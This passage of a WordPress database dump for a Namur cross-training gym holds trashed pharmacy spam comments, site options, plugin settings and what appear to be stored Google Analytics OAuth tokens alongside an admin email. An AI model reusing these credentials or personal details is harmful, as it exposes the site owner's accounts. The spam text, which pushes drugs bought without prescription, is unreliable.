(16, 1, 'HPALXNG', 'pipavloff1977@hotmail.com', 'http://dustdi.unblog.fr/#8883', '178.151.216.88', '2013-10-25 14:07:01', '2013-10-25 14:07:01', 'prix xenical en belgique\r\nacheter xenical 120\r\npurchase orlistat\r\ncomparer xenical et alli\r\n \r\nhttp://dustdi.unblog.fr/#6866 \r\nhttp://promcent.unblog.fr/#7034 \r\nhttp://tersni.unblog.fr/#2855,  acheter xenical orlistat en ligne \r\nprix xenical 120\r\norlistat prix\r\nxenical prix\r\nxenical le prix\r\nacheter alli\r\nprix xenical france\r\nxenical a petit prix\r\nxenical commander', 0, 'trash', 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2', '', 0, 0),
(17, 1, 'OIGEVOK', 'pivavloff1979@mail.ru', 'http://scarzodko.soup.io/#10665', '178.151.216.88', '2013-10-26 08:56:38', '2013-10-26 08:56:38', 'alli orlistat\r\nxenical achat en ligne\r\nxenical andorre\r\nxenical prix remboursement\r\n Zfmn9rx \r\nhttp://riavertant.soup.io/#1755 \r\nhttp://daaliveg.soup.io/#2405 \r\nhttp://scarzodko.soup.io/#2100,  xenical prix en pharmacie \r\norlistat xenical\r\nxenical pas cher\r\norlistat achat ligne\r\nprix de xenical 120 mg\r\nxenical en pharmacie\r\nalli orlistat\r\nprix xenical france\r\nacheter xenical', 0, 'trash', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_5_8) AppleWebKit/534.50.2 (KHTML, like Gecko) Version/5.0.6 Safari/533.22.3', '', 0, 0),
(18, 1, 'TMHCPPC', 'lomavloff1979@hotmail.com', 'http://tiohydjust.soup.io/#725', '178.151.216.88', '2013-10-27 21:07:15', '2013-10-27 21:07:15', 'order amoxicillin\r\ni want to buy amoxicillin\r\norder amoxicillin from canada\r\nbuy amoxil 500mg\r\n \r\nhttp://runloli.soup.io/#18605 \r\nhttp://haucocpi.soup.io/#3871 \r\nhttp://tiohydjust.soup.io/#1649,  buy cheap amoxil online \r\namoxicillin 875 mg buy\r\nbuy generic amoxil\r\nwhere to buy amoxicillin antibiotic\r\nbuy amoxicillin clavulanate\r\nbuy amoxicillin in spain\r\nbuy amoxil online canada\r\nbuy amoxicillin for toothache\r\nbuy amoxicillin australia', 0, 'trash', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20100101 Firefox/15.0', '', 0, 0),
(19, 1, 'OPKYEQO', 'lomavloff1979@hotmail.com', 'http://haucocpi.soup.io/#12093', '178.151.216.88', '2013-10-28 12:23:20', '2013-10-28 12:23:20', 'order amoxicillin capsules\r\nwhere to buy amoxicillin\r\nbuy amoxicillin eu\r\nbuy amoxicillin clavulanate\r\n \r\nhttp://runloli.soup.io/#2217 \r\nhttp://haucocpi.soup.io/#1355 \r\nhttp://tiohydjust.soup.io/#590,  where can i order amoxicillin \r\ncan buy amoxicillin line\r\nbuy amoxicillin canada\r\ncan you order amoxicillin online\r\nbuy generic amoxil\r\nwhere can i order amoxicillin\r\nbuy amoxicillin suspension online\r\nbuy amoxicillin 500mg no prescription\r\nbuy amoxicillin mexico', 0, 'trash', 'Opera/9.80 (Windows NT 5.1; MRA 6.0 (build 5998)) Presto/2.12.388 Version/12.11', '', 0, 0),
(20, 1, 'MCCORYB', 'tomvloff1977@hotmail.com', 'http://opbrit.pen.io/#8577', '178.151.216.88', '2013-10-31 15:30:33', '2013-10-31 15:30:33', 'buy prednisone canada online\r\nbuy prednisolone without prescription\r\nwhere can i buy prednisolone uk\r\nbuy prednisolone online\r\n \r\nhttp://about.me/kevincasiano/#13873 \r\nhttp://about.me/siopi/#1264 \r\nhttp://abin.pen.io/#6691,  buy prednisone cheap. \r\nto buy prednisolone\r\nprednisolone to buy uk\r\nbuy prednisone tablets\r\nbuy prednisolone acetate drops\r\nprednisolone buy online uk\r\nbuy prednisone online\r\nbuy cheap prednisone no prescription\r\nbuy prednisolone in uk\r\n \r\nhttp://perce.pen.io/#8586 \r\nhttp://about.me/frandsenpeter/#1835,  buy prednisolone 5mg uk.', 0, 'trash', 'Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0', '', 0, 0);

-- --------------------------------------------------------

--
-- Structure de la table `www_links`
--

CREATE TABLE `www_links` (
  `link_id` bigint(20) UNSIGNED NOT NULL,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) UNSIGNED NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Structure de la table `www_options`
--

CREATE TABLE `www_options` (
  `option_id` bigint(20) UNSIGNED NOT NULL,
  `option_name` varchar(64) NOT NULL DEFAULT '',
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Déchargement des données de la table `www_options`
--

INSERT INTO `www_options` (`option_id`, `option_name`, `option_value`, `autoload`) VALUES
(1, 'siteurl', 'http://www2.crosstrainingcenter.be', 'yes'),
(2, 'blogname', 'Cross Training Center de Namur', 'yes'),
(3, 'blogdescription', '', 'yes'),
(4, 'users_can_register', '0', 'yes'),
(5, 'admin_email', 'dpierrard@gmail.com', 'yes'),
(6, 'start_of_week', '1', 'yes'),
(7, 'use_balanceTags', '0', 'yes'),
(8, 'use_smilies', '1', 'yes'),
(9, 'require_name_email', '1', 'yes'),
(10, 'comments_notify', '1', 'yes'),
(11, 'posts_per_rss', '10', 'yes'),
(12, 'rss_use_excerpt', '0', 'yes'),
(13, 'mailserver_url', 'mail.example.com', 'yes'),
(14, 'mailserver_login', 'login@example.com', 'yes'),
(15, 'mailserver_pass', 'password', 'yes'),
(16, 'mailserver_port', '110', 'yes'),
(17, 'default_category', '1', 'yes'),
(18, 'default_comment_status', 'open', 'yes'),
(19, 'default_ping_status', 'open', 'yes'),
(20, 'default_pingback_flag', '1', 'yes'),
(21, 'posts_per_page', '10', 'yes'),
(22, 'date_format', 'F j, Y', 'yes'),
(23, 'time_format', 'g:i a', 'yes'),
(24, 'links_updated_date_format', 'F j, Y g:i a', 'yes'),
(25, 'links_recently_updated_prepend', '<em>', 'yes'),
(26, 'links_recently_updated_append', '</em>', 'yes'),
(27, 'links_recently_updated_time', '120', 'yes'),
(28, 'comment_moderation', '0', 'yes'),
(29, 'moderation_notify', '1', 'yes'),
(30, 'permalink_structure', '/%postname%/', 'yes'),
(31, 'gzipcompression', '0', 'yes'),
(32, 'hack_file', '0', 'yes'),
(33, 'blog_charset', 'UTF-8', 'yes'),
(34, 'moderation_keys', '', 'no'),
(35, 'active_plugins', 'a:11:{i:0;s:35:\"clicface-trombi/clicface-trombi.php\";i:1;s:36:\"contact-form-7/wp-contact-form-7.php\";i:2;s:35:\"display-widgets/display-widgets.php\";i:3;s:25:\"easy-table/easy-table.php\";i:4;s:43:\"google-analyticator/google-analyticator.php\";i:5;s:19:\"piklist/piklist.php\";i:6;s:47:\"really-simple-captcha/really-simple-captcha.php\";i:7;s:29:\"seo-ultimate/seo-ultimate.php\";i:8;s:31:\"slideshow-manager/slideshow.php\";i:9;s:29:\"total-slider/total-slider.php\";i:10;s:37:\"widgets-on-pages/widgets_on_pages.php\";}', 'yes'),
(36, 'home', 'http://www2.crosstrainingcenter.be', 'yes'),
(37, 'category_base', '', 'yes'),
(38, 'ping_sites', 'http://rpc.pingomatic.com/', 'yes'),
(39, 'advanced_edit', '0', 'yes'),
(40, 'comment_max_links', '2', 'yes'),
(41, 'gmt_offset', '0', 'yes'),
(42, 'default_email_category', '1', 'yes'),
(43, 'recently_edited', 'a:2:{i:0;s:78:\"/homez.734/crosstra/www/wp-content/plugins/display-widgets/display-widgets.php\";i:1;s:0:\"\";}', 'no'),
(44, 'template', 'figero', 'yes'),
(45, 'stylesheet', 'figero', 'yes'),
(46, 'comment_whitelist', '1', 'yes'),
(47, 'blacklist_keys', '', 'no'),
(48, 'comment_registration', '0', 'yes'),
(49, 'html_type', 'text/html', 'yes'),
(50, 'use_trackback', '0', 'yes'),
(51, 'default_role', 'subscriber', 'yes'),
(52, 'db_version', '25824', 'yes'),
(53, 'uploads_use_yearmonth_folders', '1', 'yes'),
(54, 'upload_path', '', 'yes'),
(55, 'blog_public', '1', 'yes'),
(56, 'default_link_category', '2', 'yes'),
(57, 'show_on_front', 'posts', 'yes'),
(58, 'tag_base', '', 'yes'),
(59, 'show_avatars', '1', 'yes'),
(60, 'avatar_rating', 'G', 'yes'),
(61, 'upload_url_path', '', 'yes'),
(62, 'thumbnail_size_w', '150', 'yes'),
(63, 'thumbnail_size_h', '150', 'yes'),
(64, 'thumbnail_crop', '1', 'yes'),
(65, 'medium_size_w', '300', 'yes'),
(66, 'medium_size_h', '300', 'yes'),
(67, 'avatar_default', 'mystery', 'yes'),
(68, 'large_size_w', '1024', 'yes'),
(69, 'large_size_h', '1024', 'yes'),
(70, 'image_default_link_type', 'file', 'yes'),
(71, 'image_default_size', '', 'yes'),
(72, 'image_default_align', '', 'yes'),
(73, 'close_comments_for_old_posts', '0', 'yes'),
(74, 'close_comments_days_old', '14', 'yes'),
(75, 'thread_comments', '1', 'yes'),
(76, 'thread_comments_depth', '5', 'yes'),
(77, 'page_comments', '0', 'yes'),
(78, 'comments_per_page', '50', 'yes'),
(79, 'default_comments_page', 'newest', 'yes'),
(80, 'comment_order', 'asc', 'yes'),
(81, 'sticky_posts', 'a:0:{}', 'yes'),
(82, 'widget_categories', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(83, 'widget_text', 'a:3:{i:2;a:9:{s:5:\"title\";s:1:\" \";s:4:\"text\";s:373:\"<iframe src=\"//www.facebook.com/plugins/likebox.php?href=https%3A%2F%2Fwww.facebook.com%2FCrossTrainingCenterDeNamur&amp;width=280&amp;height=590&amp;show_faces=true&amp;colorscheme=light&amp;stream=true&amp;show_border=false&amp;header=true\" scrolling=\"no\" frameborder=\"0\" style=\"border:none; overflow:hidden; width:280px; height:590px;\" allowTransparency=\"true\"></iframe>\";s:6:\"filter\";b:0;s:7:\"page-20\";i:1;s:7:\"page-22\";i:1;s:7:\"page-11\";i:1;s:6:\"page-5\";i:1;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";}i:3;a:6:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:815:\"<b><u>Adresse :</u></b><br> \r\nBowling et squash de Namur<br>\r\n251 Chssée de Perwelz<br>\r\n5002 Saint-Servais<br>\r\n<br>\r\n<br>\r\n<iframe width=\"280\" height=\"280\" frameborder=\"0\" scrolling=\"no\" marginheight=\"0\" marginwidth=\"0\" src=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;output=embed\"></iframe><br /><small><a href=\"http://maps.google.be/maps?q=251+CHAUSS%C3%89E+DE+PERWEZ+-5002+SAINT-SERVAIS&amp;ie=UTF8&amp;hq=&amp;hnear=Chauss%C3%A9e+de+Perwez+251,+Saint-Servais+5002+Namur,+R%C3%A9gion+wallonne&amp;t=m&amp;z=14&amp;ll=50.483687,4.854333&amp;source=embed\" style=\"color:#0000FF;text-align:left\">Agrandir le plan</a></small>\r\n\";s:6:\"filter\";b:0;s:10:\"dw_include\";i:1;s:9:\"other_ids\";s:0:\"\";s:6:\"page-9\";i:1;}s:12:\"_multiwidget\";i:1;}', 'yes'),
(84, 'widget_rss', 'a:0:{}', 'yes'),
(85, 'uninstall_plugins', 'a:1:{s:31:\"slideshow-manager/slideshow.php\";s:25:\"delete_slideshow_database\";}', 'no'),
(86, 'timezone_string', '', 'yes'),
(87, 'page_for_posts', '0', 'yes'),
(88, 'page_on_front', '0', 'yes'),
(89, 'default_post_format', '0', 'yes'),
(90, 'link_manager_enabled', '0', 'yes'),
(91, 'initial_db_version', '22441', 'yes'),
(92, 'www_user_roles', 'a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:63:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:26:\"total_slider_manage_slides\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}', 'yes'),
(93, 'widget_search', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(94, 'widget_recent-posts', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(179, 'widget_tag_cloud', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(95, 'widget_recent-comments', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(96, 'widget_archives', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(97, 'widget_meta', 'a:1:{s:12:\"_multiwidget\";i:1;}', 'yes'),
(98, 'sidebars_widgets', 'a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:19:\"primary-widget-area\";a:2:{i:0;s:6:\"text-2\";i:1;s:6:\"text-3\";}s:21:\"secondary-widget-area\";a:0:{}s:24:\"first-footer-widget-area\";a:0:{}s:25:\"second-footer-widget-area\";a:0:{}s:24:\"third-footer-widget-area\";a:0:{}s:25:\"fourth-footer-widget-area\";a:0:{}s:5:\"wop-1\";a:1:{i:0;s:21:\"total_slider_widget-2\";}s:13:\"array_version\";i:3;}', 'yes'),
(99, 'cron', 'a:6:{i:1383588292;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1383588303;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1383588591;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1383589524;a:1:{s:25:\"su-sds-blog-load-blog-rss\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1383591600;a:1:{s:20:\"wp_maybe_auto_update\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}s:7:\"version\";i:2;}', 'yes'),
(3332, '_site_transient_timeout_theme_roots', '1383587164', 'yes'),
(3333, '_site_transient_theme_roots', 'a:4:{s:6:\"figero\";s:7:\"/themes\";s:12:\"twentyeleven\";s:7:\"/themes\";s:14:\"twentythirteen\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}', 'yes'),
(3317, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1383583253;s:7:\"checked\";a:4:{s:6:\"figero\";s:5:\"1.5.1\";s:12:\"twentyeleven\";s:3:\"1.5\";s:14:\"twentythirteen\";s:3:\"1.1\";s:12:\"twentytwelve\";s:3:\"1.1\";}s:8:\"response\";a:2:{s:12:\"twentyeleven\";a:3:{s:11:\"new_version\";s:3:\"1.7\";s:3:\"url\";s:41:\"https://wordpress.org/themes/twentyeleven\";s:7:\"package\";s:58:\"https://wordpress.org/themes/download/twentyeleven.1.7.zip\";}s:12:\"twentytwelve\";a:3:{s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:41:\"https://wordpress.org/themes/twentytwelve\";s:7:\"package\";s:58:\"https://wordpress.org/themes/download/twentytwelve.1.3.zip\";}}s:12:\"translations\";a:0:{}}', 'yes'),
(108, 'dashboard_widget_options', 'a:4:{s:25:\"dashboard_recent_comments\";a:1:{s:5:\"items\";i:5;}s:24:\"dashboard_incoming_links\";a:5:{s:4:\"home\";s:34:\"http://www2.crosstrainingcenter.be\";s:4:\"link\";s:110:\"http://blogsearch.google.com/blogsearch?scoring=d&partner=wordpress&q=link:http://www2.crosstrainingcenter.be/\";s:3:\"url\";s:142:\"http://blogsearch.google.com/blogsearch_feeds?scoring=d&ie=utf-8&num=10&output=rss&partner=wordpress&q=link:http://www.crosstrainingcenter.be/\";s:5:\"items\";i:10;s:9:\"show_date\";b:0;}s:17:\"dashboard_primary\";a:7:{s:4:\"link\";s:26:\"http://wordpress.org/news/\";s:3:\"url\";s:31:\"http://wordpress.org/news/feed/\";s:5:\"title\";s:14:\"WordPress Blog\";s:5:\"items\";i:2;s:12:\"show_summary\";i:1;s:11:\"show_author\";i:0;s:9:\"show_date\";i:1;}s:19:\"dashboard_secondary\";a:7:{s:4:\"link\";s:28:\"http://planet.wordpress.org/\";s:3:\"url\";s:33:\"http://planet.wordpress.org/feed/\";s:5:\"title\";s:20:\"Other WordPress News\";s:5:\"items\";i:5;s:12:\"show_summary\";i:0;s:11:\"show_author\";i:0;s:9:\"show_date\";i:0;}}', 'yes'),
(2842, '_transient_timeout_feed_mod_a5420c83891a9c88ad2a4f04584a5efc', '1382926898', 'no'),
(2843, '_transient_feed_mod_a5420c83891a9c88ad2a4f04584a5efc', '1382883698', 'no'),
(2848, '_transient_timeout_feed_mod_57bc725ad6568758915363af670fd8bc', '1382926899', 'no'),
(2849, '_transient_feed_mod_57bc725ad6568758915363af670fd8bc', '1382883699', 'no'),
(1454, 'ga_version', '6.4.5', 'yes'),
(1461, 'key_ga_show_ad', '1', 'yes'),
(1492, 'ga_status', 'enabled', 'yes'),
(1493, 'ga_uid', 'UA-43427378-1', 'yes'),
(1494, 'ga_admin_status', 'enabled', 'yes'),
(1495, 'ga_admin_disable', 'remove', 'yes'),
(1496, 'ga_admin_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1497, 'ga_dashboard_role', 'a:1:{i:0;s:13:\"administrator\";}', 'yes'),
(1498, 'ga_adsense', '', 'yes'),
(1499, 'ga_extra', '', 'yes'),
(1500, 'ga_extra_after', '', 'yes'),
(1501, 'ga_event', 'enabled', 'yes'),
(1502, 'ga_outbound', 'enabled', 'yes'),
(1503, 'ga_outbound_prefix', 'outgoing', 'yes'),
(1504, 'ga_downloads', '', 'yes'),
(1505, 'ga_downloads_prefix', 'download', 'yes'),
(1506, 'ga_widgets', 'enabled', 'yes'),
(1507, 'ga_annon', '0', 'yes'),
(1508, 'ga_defaults', 'no', 'yes'),
(1509, 'ga_google_token', '4/dNk5yqbLvToGOr1L7AxlR-X-8Ajt.EujwRiWfyc0aOl05ti8ZT3Yx2ttUgQI', 'yes'),
(1510, 'ga_google_authtoken', '{\"access_token\":\"ya29.AHES6ZRbkgsrQiqi5K4snq6eD62QKMa5qD6wa3jo62-mJRCzxnoZjA\",\"token_type\":\"Bearer\",\"expires_in\":3600,\"refresh_token\":\"1\\/OfCFSCmF7A0ckb7rn1b2TIgqTbSrbglAQ6AYdvuZWUQ\",\"created\":1377248758}', 'yes'),
(1511, 'ga_enable_remarketing', '0', 'yes'),
(1512, 'key_ga_track_login', '0', 'yes'),
(780, 'seo_ultimate_module_more-links', 'a:1:{s:7:\"default\";s:45:\"Continue reading &#8220;{post}&#8221; &raquo;\";}', 'yes'),
(781, 'seo_ultimate_module_opengraph', 'a:6:{s:20:\"default_post_og_type\";s:7:\"article\";s:20:\"default_page_og_type\";s:7:\"article\";s:25:\"default_post_twitter_card\";s:7:\"summary\";s:25:\"default_page_twitter_card\";s:7:\"summary\";s:31:\"default_attachment_twitter_card\";s:5:\"photo\";s:24:\"enable_og_article_author\";b:1;}', 'yes'),
(782, 'seo_ultimate_module_permalinks', 'a:1:{s:20:\"add_rule_if_conflict\";b:1;}', 'yes'),
(783, 'seo_ultimate_module_sharing-buttons', 'a:3:{s:8:\"provider\";s:4:\"none\";s:14:\"sharethis_code\";s:104:\"<script type=\"text/javascript\" charset=\"utf-8\" src=\"http://w.sharethis.com/widget/?wp={wpver}\"></script>\";s:12:\"addthis_code\";s:298:\"<a class=\"addthis_button\" href=\"http://addthis.com/bookmark.php?v=250\"><img src=\"http://s7.addthis.com/static/btn/v2/lg-share-en.gif\" width=\"125\" height=\"16\" alt=\"Bookmark and Share\" style=\"border:0\"/></a><script type=\"text/javascript\" src=\"http://s7.addthis.com/js/250/addthis_widget.js\"></script>\";}', 'yes'),
(216, 'recently_activated', 'a:0:{}', 'yes'),
(402, 'total_slider_slides_objectifs', 'a:2:{i:0;a:7:{s:2:\"id\";s:22:\"51bda731e758a799802144\";s:5:\"title\";s:20:\"Coaching personnel :\";s:11:\"description\";s:163:\"Un coach vous suivra tout au long de vos séances pour vous proposer des exercices adaptés à votre niveau, vos objectifs et vos caractéristiques individuelles. \";s:10:\"background\";s:1:\"0\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}i:1;a:7:{s:2:\"id\";s:22:\"51bda771a2759105225246\";s:5:\"title\";s:27:\"Encadrement professionnel :\";s:11:\"description\";s:152:\"Notre équipe est composée de spécialistes issus du milieu de l’éducation physique, de la kinésithérapie, de la diététique et de la médecine. \";s:10:\"background\";s:2:\"68\";s:4:\"link\";s:0:\"\";s:11:\"title_pos_x\";i:278;s:11:\"title_pos_y\";i:178;}}', 'yes'),
(407, 'widget_total_slider_widget', 'a:2:{i:2;a:3:{s:9:\"groupSlug\";s:9:\"objectifs\";s:10:\"dw_include\";i:0;s:9:\"other_ids\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}', 'yes'),
(505, 'piklist_active_plugin_versions', 'a:2:{s:19:\"piklist/piklist.php\";a:2:{i:0;s:5:\"0.7.2\";i:1;s:5:\"0.7.2\";}s:35:\"clicface-trombi/clicface-trombi.php\";a:3:{i:0;s:4:\"1.09\";i:1;s:4:\"1.08\";i:2;s:4:\"1.08\";}}', 'yes'),
(506, 'piklist_post_type_rules_flushed', 'a:1:{s:13:\"collaborateur\";b:1;}', 'yes'),
(3219, '_transient_feed_4725d5c1115324486aa3db40a3f9703a', 'a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:4:\"\n  \n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:33:\"\n    \n    \n    \n    \n    \n    \n  \";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:3:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"link:http://www.crosstrainingcenter.be/ - Google Blog Search\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:97:\"http://www.google.com/search?ie=utf-8&q=link:http://www.crosstrainingcenter.be/&tbm=blg&tbs=sbd:1\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:91:\"Your search - <b>link:http://www.crosstrainingcenter.be/</b> - did not match any 